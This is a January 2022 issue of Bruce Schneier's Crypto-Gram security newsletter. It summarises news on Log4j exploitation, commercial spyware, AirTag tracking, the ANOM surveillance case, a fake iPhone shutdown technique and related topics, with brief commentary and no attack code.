Crypto-Gram 
January 15, 2022

by Bruce Schneier 
Fellow and Lecturer, Harvard Kennedy School  schneier@schneier.com 
https://www.schneier.com

A free monthly newsletter providing summaries, analyses, insights, and 
commentaries on security: computer and otherwise.

For back issues, or to subscribe, visit Crypto-Gram's web page.

Read this issue on the web

These same essays and news items appear in the Schneier on Security blog, along
with a lively and intelligent comment section. An RSS feed is available.

** *** ***** ******* *********** *************

In this issue:

If these links don't work in your email client, try reading this issue of
Crypto-
Gram on the web.

More Log4j News
More on NSO Group and Cytrox: Two Cyberweapons Arms Manufacturers Stolen
Bitcoins Returned
Apple AirTags Are Being Used to Track People and Cars More Russian Cyber
Operations against Ukraine People Are Increasingly Choosing Private Web Search
Norton�s Antivirus Product Now Includes an Ethereum Miner Fake QR Codes on
Parking Meters
Apple�s Private Relay Is Being Blocked Faking an iPhone Reboot
Using Foreign Nationals to Bypass US Surveillance Restrictions Using EM Waves to
Detect Malware
Upcoming Speaking Engagements
** *** ***** ******* *********** *************

More Log4j News

[2021.12.16] Log4j is being exploited by all sorts of attackers, all over the 
Internet:

At that point it was reported that there were over 100 attempts to exploit the 
vulnerability every minute. �Since we started to implement our protection we 
prevented over 1,272,000 attempts to allocate the vulnerability, over 46% of 
those attempts were made by known malicious groups,� said cybersecurity company
Check Point.

And according to Check Point, attackers have now attempted to exploit the flaw
on 
over 40% of global networks.

And a second vulnerability was found, in the patch for the first vulnerability.
This is likely not to be the last.

** *** ***** ******* *********** *************

More on NSO Group and Cytrox: Two Cyberweapons Arms Manufacturers

[2021.12.20] Citizen Lab published another report on the spyware used against
two 
Egyptian nationals. One was hacked by NSO Group�s Pegasus spyware. The other was

hacked both by Pegasus and by the spyware from another cyberweapons arms 
manufacturer: Cytrox.

We haven�t heard a lot about Cytrox and its Predator spyware. According to
Citzen 
Lab:

We conducted Internet scanning for Predator spyware servers and found likely 
Predator customers in Armenia, Egypt, Greece, Indonesia, Madagascar, Oman, Saudi

Arabia, and Serbia.

Cytrox was reported to be part of Intellexa, the so-called �Star Alliance of 
spyware,� which was formed to compete with NSO Group, and which describes itself

as �EU-based and regulated, with six sites and R&D labs throughout Europe.�

In related news, Google�s Project Zero has published a detailed analysis of NSO
Group�s zero-click iMessage exploit: FORCED ENTRY.

Based on our research and findings, we assess this to be one of the most 
technically sophisticated exploits we�ve ever seen, further demonstrating that 
the capabilities NSO provides rival those previously thought to be accessible to

only a handful of nation states.

By the way, this vulnerability was patched on 13 Sep 2021 in iOS 14.8.

** *** ***** ******* *********** *************

Stolen Bitcoins Returned

[2021.12.22] The US has returned $154 million in bitcoins stolen by a Sony 
employee.

However, on December 1, following an investigation in collaboration with
Japanese 
law enforcement authorities, the FBI seized the 3879.16242937 BTC in Ishii�s 
wallet after obtaining the private key, which made it possible to transfer all 
the bitcoins to the FBI�s bitcoin wallet.

** *** ***** ******* *********** *************

Apple AirTags Are Being Used to Track People and Cars

[2021.12.31] This development suprises no one who has been paying attention:

Researchers now believe AirTags, which are equipped with Bluetooth technology, 
could be revealing a more widespread problem of tech-enabled tracking. They emit

a digital signal that can be detected by devices running Apple�s mobile
operating 
system. Those devices then report where an AirTag has last been seen. Unlike 
similar tracking products from competitors such as Tile, Apple added features to

prevent abuse, including notifications like the one Ms. Estrada received and 
automatic beeping. (Tile plans to release a feature to prevent the tracking of 
people next year, a spokeswoman for that company said.)

[...]

A person who doesn�t own an iPhone might have a harder time detecting an
unwanted 
AirTag. AirTags aren�t compatible with Android smartphones. Earlier this month,
Apple released an Android app that can scan for AirTags -- but you have to be 
vigilant enough to download it and proactively use it.

Apple declined to say if it was working with Google on technology that would 
allow Android phones to automatically detect its trackers.

People who said they have been tracked have called Apple�s safeguards 
insufficient. Ms. Estrada said she was notified four hours after her phone first

noticed the rogue gadget. Others said it took days before they were made aware
of 
an unknown AirTag. According to Apple, the timing of the alerts can vary 
depending on the iPhone�s operating system and location settings.

** *** ***** ******* *********** *************

More Russian Cyber Operations against Ukraine

[2022.01.05] Both Russia and Ukraine are preparing for military operations in 
cyberspace.

** *** ***** ******* *********** *************

People Are Increasingly Choosing Private Web Search

[2022.01.06] DuckDuckGo has had a banner year:

And yet, DuckDuckGo. The privacy-oriented search engine netted more than 35 
billion search queries in 2021, a 46.4% jump over 2020 (23.6 billion). That�s 
big. Even so, the company, which bills itself as the �Internet privacy company,�

offering a search engine and other products designed to �empower you to 
seamlessly take control of your personal information online without any 
tradeoffs,� remains a rounding error compared to Google in search.

I use it. It�s not as a good a search engine as Google. Or, at least, Google 
often gets me what I want faster than DuckDuckGo does. To solve that, I use use
the feature that allows me to use Google�s search engine through DuckDuckGo: 
prepend �!Google� to searches. Basically, DuckDuckGo launders my search.

EDITED TO ADD (1/12): I was wrong. DuckDuckGo does not provide privacy 
protections when searching using Google.

** *** ***** ******* *********** *************

Norton�s Antivirus Product Now Includes an Ethereum Miner

[2022.01.07] Norton 360 can now mine Ethereum. It�s opt-in, and the company
keeps 
15%.

It�s hard to uninstall this option.

** *** ***** ******* *********** *************

Fake QR Codes on Parking Meters

[2022.01.10] The City of Austin is warning about QR codes stuck to parking
meters 
that take people to fraudulent payment sites.

** *** ***** ******* *********** *************

Apple�s Private Relay Is Being Blocked

[2022.01.11] Some European cell phone carriers, and now T-Mobile, are blocking 
Apple�s Private Relay anonymous browsing feature.

This could be an interesting battle to watch.

Slashdot thread.

** *** ***** ******* *********** *************

Faking an iPhone Reboot

[2022.01.12] Researchers have figured how how to intercept and fake an iPhone 
reboot:

We�ll dissect the iOS system and show how it�s possible to alter a shutdown 
event, tricking a user that got infected into thinking that the phone has been 
powered off, but in fact, it�s still running. The �NoReboot� approach simulates
a 
real shutdown. The user cannot feel a difference between a real shutdown and a 
�fake shutdown.� There is no user-interface or any button feedback until the
user 
turns the phone back �on.�

It�s a complicated hack, but it works.

Uses are obvious:

Historically, when malware infects an iOS device, it can be removed simply by 
restarting the device, which clears the malware from memory.

However, this technique hooks the shutdown and reboot routines to prevent them 
from ever happening, allowing malware to achieve persistence as the device is 
never actually turned off.

I see this as another manifestation of the security problems that stem from all
controls becoming software controls. Back when the physical buttons actually did

things -- like turn the power, the Wi-Fi, or the camera on and off -- you could
actually know that something was on or off. Now that software controls those 
functions, you can never be sure.

** *** ***** ******* *********** *************

Using Foreign Nationals to Bypass US Surveillance Restrictions

[2022.01.13] Remember when the US and Australian police surreptitiously owned
and 
operated the encrypted cell phone app ANOM? They arrested 800 people in 2021 
based on that operation.

New documents received by Motherboard show that over 100 of those phones were 
shipped to users in the US, far more than previously believed.

What�s most interesting to me about this new information is how the US used the
Australians to get around domestic spying laws:

For legal reasons, the FBI did not monitor outgoing messages from Anom devices 
determined to be inside the U.S. Instead, the Australian Federal Police (AFP) 
monitored them on behalf of the FBI, according to previously published court 
records. In those court records unsealed shortly before the announcement of the
Anom operation, FBI Special Agent Nicholas Cheviron wrote that the FBI received
Anom user data three times a week, which contained the messages of all of the 
users of Anom with some exceptions, including �the messages of approximately 15
Anom users in the U.S. sent to any other Anom device.�

[...]

Stewart Baker, partner at Steptoe & Johnson LLP, and Bryce Klehm, associate 
editor of Lawfare, previously wrote that �The �threat to life; standard echoes 
the provision of U.S. law that allows communications providers to share user
data 
with law enforcement without legal process under 18 U.S.C. $ 2702. Whether the 
AFP was relying on this provision of U.S. law or a more general moral
imperative 
to take action to prevent imminent threats is not clear.� That section of law 
discusses the voluntary disclosure of customer communications or records.

When asked about the practice of Australian law enforcement monitoring devices 
inside the U.S. on behalf of the FBI, Senator Ron Wyden told Motherboard in a 
statement �Multiple intelligence community officials have confirmed to me, in 
writing, that intelligence agencies cannot ask foreign partners to conduct 
surveillance that the U.S. would be legally prohibited from doing itself. The
FBI 
should follow this same standard. Allegations that the FBI outsourced
warrantless 
surveillance of Americans to a foreign government raise troubling questions
about 
the Justice Department�s oversight of these practices.�

I and others have long suspected that the NSA uses foreign nationals to get 
around restrictions that prevent it from spying on Americans. It is interesting
to see the FBI using the same trick.

** *** ***** ******* *********** *************

Using EM Waves to Detect Malware

[2022.01.14] I don�t even know what I think about this. Researchers have 
developed a malware detection system that uses EM waves: �Obfuscation Revealed:
Leveraging Electromagnetic Signals for Obfuscated Malware Classification.�

Abstract: The Internet of Things (IoT) is constituted of devices that are 
exponentially growing in number and in complexity. They use numerous customized
firmware and hardware, without taking into consideration security issues, which
make them a target for cybercriminals, especially malware authors.

We will present a novel approach of using side channel information to identify 
the kinds of threats that are targeting the device. Using our approach, a
malware 
analyst is able to obtain precise knowledge about malware type and identity,
even 
in the presence of obfuscation techniques which may prevent static or symbolic 
binary analysis. We recorded 100,000 measurement traces from an IoT device 
infected by various in-the-wild malware samples and realistic benign activity. 
Our method does not require any modification on the target device. Thus, it can
be deployed independently from the resources available without any overhead. 
Moreover, our approach has the advantage that it can hardly be detected and 
evaded by the malware authors. In our experiments, we were able to predict three

generic malware types (and one benign class) with an accuracy of 99.82%. Even 
more, our results show that we are able to classify altered malware samples with

unseen obfuscation techniques during the training phase, and to determine what 
kind of obfuscations were applied to the binary, which makes our approach 
particularly useful for malware analysts.

This seems impossible. It�s research, not a commercial product. But it�s 
fascinating if true.

** *** ***** ******* *********** *************

Upcoming Speaking Engagements

[2022.01.14] This is a current list of where and when I am scheduled to speak:

I�m giving an online-only talk on �Securing a World of Physically Capable 
Computers� as part of Teleport�s Security Visionaries 2022 series, on January
18, 
2022.
I�m speaking at IT-S Now 2022 in Vienna on June 2, 2022. I�m speaking at the
14th International Conference on Cyber Conflict, CyCon 2022, 
in Tallinn, Estonia on June 3, 2022. I�m speaking at the RSA Conference 2022 in
San Francisco, June 6-9, 2022. The list is maintained on this page.

** *** ***** ******* *********** *************

Since 1998, CRYPTO-GRAM has been a free monthly newsletter providing summaries,
analyses, insights, and commentaries on security technology. To subscribe, or to

read back issues, see Crypto-Gram's web page.

You can also read these articles on my blog, Schneier on Security.

Please feel free to forward CRYPTO-GRAM, in whole or in part, to colleagues and
friends who will find it valuable. Permission is also granted to reprint CRYPTO-
GRAM, as long as it is reprinted in its entirety.

Bruce Schneier is an internationally renowned security technologist, called a 
security guru by the Economist. He is the author of over one dozen books -- 
including his latest, We Have Root -- as well as hundreds of articles, essays, 
and academic papers. His newsletter and blog are read by over 250,000 people. 
Schneier is a fellow at the Berkman Klein Center for Internet & Society at 
Harvard University; a Lecturer in Public Policy at the Harvard Kennedy School; a

board member of the Electronic Frontier Foundation, AccessNow, and the Tor 
Project; and an Advisory Board Member of the Electronic Privacy Information 
Center and VerifiedVoting.org. He is the Chief of Security Architecture at 
Inrupt, Inc.

Copyright C 2022 by Bruce Schneier.

** *** ***** ******* *********** *************

Mailing list hosting graciously provided by MailChimp. Sent without web bugs or
link tracking.

--- BBBS/Li6 v4.10 Toy-5
 * Origin: TCOB1 at tcob1.duckdns.org BinkP / Telnet (618:500/14)